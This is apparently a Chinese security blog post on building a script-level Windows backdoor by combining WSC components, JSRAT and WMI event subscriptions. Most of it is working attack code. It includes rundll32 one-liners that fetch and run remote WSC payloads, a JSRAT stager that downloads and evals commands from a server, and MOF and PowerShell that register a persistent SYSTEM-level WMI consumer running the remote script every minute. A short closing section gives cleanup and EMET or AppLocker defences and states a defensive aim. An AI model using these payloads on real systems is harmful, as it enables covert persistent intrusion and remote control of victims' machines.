最近学习了lcx提供的资料《利用wsc来做一个asp后门》,在了解了wsc文件的一些特性后,产生了一个有趣的想法:
如果将其与JSRAT和WMI Backdoor相结合,那将会有多大的威力呢?
相关资料:
《利用wsc来做一个asp后门》:http://huaidan.org/archives/2574.html
《WMI Backdoor》: http://drops.wooyun.org/tips/8260
《JavaScript Backdoor》: http://drops.wooyun.org/tips/11764
WSC,全称Windows Script
可用来开发COM组件
可被其他语言调用
更多介绍见:
http://www.xav.com/perl/Windows/windows_script_components.html
一个简单的wsc脚本如下,保存为test.wsc:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
<?
xml
version
=
"1.0"
?>
<
package
>
<
component
id
=
"testWSC"
>
<
public
>
<
method
name
=
"Sum"
>
<
PARAMETER
name
=
"X"
/>
<
PARAMETER
name
=
"Y"
/>
</
method
>
</
public
>
<
script
language
=
"JScript"
>
<![CDATA[
function Sum(X, Y) {
var result = X + Y;
return result;
}
]]>
</
script
>
</
component
>
</
package
>
|
通过如下js代码即可调用脚本中的Sum函数:
1
2
3
|
var
ref = GetObject(
"script:C:\\testwsc\\test.wsc"
);
var
x = ref.Sum(4,6);
WScript.Echo(x);
|
如图
注:
wsc文件的后缀名可以任意
以上内容和sct文件似曾相识,所以我们可以把里面的功能修改为启动一个计算器
wsc文件如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
<?
xml
version
=
"1.0"
?>
<
package
>
<
component
id
=
"testCalc"
>
<
script
language
=
"JScript"
>
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</
script
>
</
component
>
</
package
>
|
对应的js文件可简化为:
1
|
GetObject(
"script:C:\\testwsc\\test.wsc"
);
|
执行后如图:
—— 如果把wsc文件放到服务器上面呢? —— 当然可以正常执行。
地址如下: https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test
js文件修改为:
1
|
GetObject(
"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test"
)
|
执行如图:
如果用在rundll32执行js的方法上会怎样呢?
cmd下执行:
1
|
rundll32.exe javascript:
"\..\mshtml,RunHTMLApplication "
;document.write();GetObject(
"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test"
)
|
如图
如果把服务器上文件的内容替换成jsrat的启动代码会怎样呢?
代码如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
<?
xml
version
=
"1.0"
?>
<
package
>
<
component
id
=
"testCalc"
>
<
script
language
=
"JScript"
>
<![CDATA[
rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
\";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</
script
>
</
component
>
</
package
>
|
为区别演示,已上传至另一文件testJSRAT:
https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/testJSRAT
cmd下执行:
1
|
rundll32.exe javascript:
"\..\mshtml,RunHTMLApplication "
;document.write();GetObject(
"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/testJSRAT"
)
|
执行后弹回JSRAT的shell
这种方式有如下优点:
a.再次简化了JSRAT的启动代码,只需要执行GetObject()
b.由于是远程执行wsc文件,所以payload随时可以更改,代码可以随时升级
通过WMI不仅可以定时执行程序,还能定时执行脚本
定时执行程序的方法之前介绍过,此处跳过,下面介绍一下定时执行脚本的方法
WMI支持vbs和js脚本,这里只介绍启动js脚本的方法
注意转义字符
"用\"表示
内容如下:
pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP1"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 1"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consP1"; ScriptingEngine = "JScript"; ScriptText = "GetObject(\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
演示略
注意转义字符
"用""表示
内容如下:
1
2
3
4
5
6
7
8
9
10
11
12
|
$filterName
=
'filtP1'
$consumerName
=
'consP1'
$Command
=
"GetObject("
"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test"
")"
$Query
=
"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter
=
Set
-WmiInstance
-Class
__EventFilter
-NameSpace
"root\subscription"
-Arguments
@{Name=
$filterName
;EventNameSpace=
"root\cimv2"
;QueryLanguage=
"WQL"
;Query=
$Query
}
-ErrorAction
Stop
$WMIEventConsumer
=
Set
-WmiInstance
-Class
ActiveScriptEventConsumer
-Namespace
"root\subscription"
-Arguments
@{Name=
$consumerName
;ScriptingEngine=
'JScript'
;ScriptText=
$Command
}
Set
-WmiInstance
-Class
__FilterToConsumerBinding
-Namespace
"root\subscription"
-Arguments
@{Filter=
$WMIEventFilter
;Consumer=
$WMIEventConsumer
}
|
演示略
1
2
3
4
5
6
7
|
Get-WMIObject
-Namespace
root\Subscription
-Class
__EventFilter
Get-WMIObject
-Namespace
root\Subscription
-Class
__EventConsumer
Get-WMIObject
-Namespace
root\Subscription
-Class
__FilterToConsumerBinding
|
1
2
3
4
5
|
Get-WMIObject
-Namespace
root\Subscription
-Class
__EventFilter
-Filter
"Name='filtP1'"
| Remove
-WmiObject
-Verbose
Get-WMIObject
-Namespace
root\Subscription
-Class
CommandLineEventConsumer
-Filter
"Name='consP1'"
| Remove
-WmiObject
-Verbose
Get-WMIObject
-Namespace
root\Subscription
-Class
__FilterToConsumerBinding
-Filter
"__Path LIKE '%BotFilter82%'"
| Remove
-WmiObject
-Verbose
|
a. 注册后每隔1分钟执行一次远程服务器上的js脚本
b. 权限为system
c. payload可以随时更换
d. 不写文件
e. 不写注册表
f. 自启动
确保系统不被入侵。这个后门方法植入的前提是需要在系统上能够执行代码,所以建议勤打补丁、安装杀毒软件、防火墙
建立白名单机制。启动Windows AppLocker,限制白名单以外的程序和脚本运行
使用EMET(增强减灾体验工具)。配置规则可拦截并记录regsvr32和rundll32的使用 参考链接:
https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET#blocking-the-regsvr32-application-whitelisting-bypass-technique
1、下载安装EMET 5.5
https://www.microsoft.com/en-us/download/details.aspx?id=50766
2、配置EMET组策略模板
(a)在%ProgramFiles%\EMET 5.5\Deployment\Group Policy Files\
或%ProgramFiles(x86)%\EMET 5.5\Deployment\Group Policy Files\
(64位系统)下找到:
EMET.admx
EMET.adml
如图
(b)将EMET.admx复制到%SystemRoot%\PolicyDefinitions\
下
(c)将EMET.adml复制到%SystemRoot%\PolicyDefinitions\zh-CN
下(英文版系统复制到%SystemRoot%\PolicyDefinitions\en-us\
)
3、配置EMET规则
(a)输入gpedit.msc进入组策略 中文系统为:
计算机配置-管理模板-Windows组件-EMET
英文系统为:
Computer Policy > Administrative Templates > Windows Components > EMET
(b)双击Application Configuration
选择启用
点击显示
如图
(c)设置
值名称: *\regsvr32.exe
值: +ASR asr_modules:scrobj.dll;scrrun.dll
如图
(d)更新组策略模板
管理权权限的cmd下输入:
1
|
gpupdate
/force
|
如图
(e)测试
通过regsvr32调用scrobj.dll的操作被拦截
本文将WSC、JSRAT和WMI Backdoor三项技术融合,在脚本层面实现了一个近乎“完美”的后门。
当然,本文的初衷是在这项技术被滥用前尽可能的帮助大家提前做好防御的准备。